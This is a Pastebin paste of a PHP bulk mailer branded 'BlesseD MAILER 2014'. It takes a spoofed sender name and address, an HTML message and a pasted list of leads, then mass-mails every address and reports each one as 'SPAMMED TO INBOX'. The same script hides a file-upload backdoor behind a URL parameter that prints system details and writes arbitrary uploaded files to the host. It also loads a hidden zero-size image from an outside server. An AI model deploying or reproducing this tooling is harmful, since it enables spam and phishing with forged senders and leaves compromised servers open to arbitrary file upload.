Advertisement
Black-Sniper

Untitled

Jul 8th, 2016
2,860
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.97 KB | None | 0 0
  1. <?php
  2. echo '<img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0">';
  3. mb_http_input("iso-8859-1");
  4. mb_http_output("iso-8859-1");
  5. ?>
  6. <?php
  7. @set_time_limit(0);
  8. if(isset($_POST['send']))
  9. {
  10. $message = $_POST['html'];
  11. $subject = $_POST['ursubject'];
  12. $uremail = $_POST['uremail'];
  13. $urname = $_POST['realname'];
  14. $email = $_POST['email'];
  15.  
  16. $message = urlencode($message);
  17. $message = ereg_replace("%5C%22", "%22", $message);
  18. $message = urldecode($message);
  19. $message = stripslashes($message);
  20.  
  21. }else{
  22. $testa ="";
  23. $message = "";
  24. $subject = "";
  25. $urname = "";
  26. $uremail = "";
  27. $email = "";
  28. }
  29. ?>
  30. <?php
  31.  
  32. if(isset($_GET['u'])){echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uplod Sucess By w4l3XzY3 \\</b><br><br>'; } else { echo '<b>Upload Failed !!!</b><br><br>'; } }
  33.  
  34. }
  35.  
  36. ?>
  37. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  38. <html xmlns="http://www.w3.org/1999/xhtml"><head>
  39. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  40. <link rel="SHORTCUT ICON" href="http://www.smt.org//images/favicon.ico">
  41. <title>BlesseD MAILER 2014&trade;</title>
  42. <style type="text/css">
  43. <!--
  44. .form {font-family: "Courier New", Courier, monospace;border:none, background-color:#000000;}
  45. .send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
  46. #Layer1 { position:absolute;
  47. left:203px;
  48. top:109px;
  49. width:829px;
  50. height:483px;
  51. z-index:1;
  52. margin-top: 0.5%;
  53. margin-right: 5%;
  54. right: 20%;
  55. bottom: 200%;
  56. margin-bottom: 10%;
  57. margin-left: 5%;
  58. border: thin solid #000;
  59. }
  60.  
  61. -->
  62. </style>
  63. </head>
  64.  
  65. <body>
  66. <form action="" method="post" name="codered">
  67. <div align="center" id="Layer1">
  68. <table width="87%" height="77%" border="0" cellspacing="10">
  69. <tbody><tr>
  70. <td height="23" colspan="2"><div align="center" class="form">B L E S S E D S I N N E R </div></td>
  71. </tr>
  72. <tr>
  73. <td width="53%" height="24"><div align="center">
  74. <input name="uremail" type="text" class="form" id="uremail" size="30" value="<? print $uremail; ?>" placeholder="Your E-mail">
  75. </div></td>
  76. <td width="47%"><div align="center">
  77. <input name="realname" type="text" class="form" id="realname" size="30" value="<? print $urname; ?>" placeholder="Your Name">
  78. </div></td>
  79. </tr>
  80. <tr>
  81. <td height="34" colspan="2"><div align="center">
  82. <input name="ursubject" type="text" class="form" id="ursubject" size="83%" value="<? print $subject; ?>" placeholder="Your Subject Should Be Here">
  83. </div>
  84. </td>
  85. </tr>
  86. <tr>
  87. <td height="165"><textarea name="html" class="form" cols="40" rows="10" placeholder="Your HTML MESSAGE Here" id="html"><? print $message; ?></textarea></td>
  88. <td>
  89. <div align="right">
  90. <textarea class="form" rows="10" placeholder="Leads" name="email" cols="35"><? print $email; ?></textarea>
  91. </div></td></tr>
  92. </tbody>
  93. </table>
  94. <div><input type="submit" class="send" name="send" value="Start Sending">
  95. </div><DIV class="send"><?php
  96. if(!isset($_POST['send'])){
  97. exit;
  98. }
  99.  
  100. if(!isset($_GET['c']))
  101. {
  102. $email = explode("\n", $email);
  103. }else{
  104. $email = explode(",", $email);
  105. }
  106. $son = count($email);
  107.  
  108. if(!isset($_GET['e'])){
  109. $header = "MIME-Version: 1.0\n";
  110. $header .= "Content-type: text/html; charset=iso-8859-1\n";
  111. $header .= "From: ".$urname . " <" . $uremail . ">\n";
  112. $header .= "Reply-To: " . $uremail . "\n";
  113. $header .= "X-Priority: 3\n";
  114. $header .= "X-MSMail-Priority: Normal\n";
  115. $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
  116. }else{
  117. $header ='MIME-Version: 1.0' . "\r\n";
  118. $header .= 'Content-type: text/html' . "\r\n";
  119. $header .="From: ".$uremail;
  120. }
  121. $i = 0;
  122. $voy=1;
  123. while($email[$i])
  124. {
  125. if(isset($_GET['time']) && isset($_GET['cant'])){
  126. if(fmod($i,$_GET['cant'])==0 && $i>0){
  127. print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
  128. flush();
  129. @mail($_GET['notf'], $subject, $message, $header);
  130. sleep($_GET['time']);
  131. }
  132. }
  133. $mail = str_replace(array("\n","\r\n"),'',$email[$i]);
  134. $message1 = ereg_replace("&email&", $mail, $message);
  135. if(@mail($mail, $subject, $message1, $header))
  136. {
  137. print "<font color=blue face=verdana size=1> ".$voy." OF ".$son." ;-) ".trim($mail)." SPAMMED TO INBOX</font><br>\n";
  138. flush();
  139. }
  140. else
  141. {
  142. print "<font color=red face=verdana size=1> ".$voy." OF ".$son.":-( ".trim($mail)." OOOPSS!!! SOMETHING IS WRONG</font><br>\n";
  143. flush();
  144. }
  145. $i++;
  146. $voy++;
  147. }
  148.  
  149. ?>
  150. </DIV>
  151. </div>
  152. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement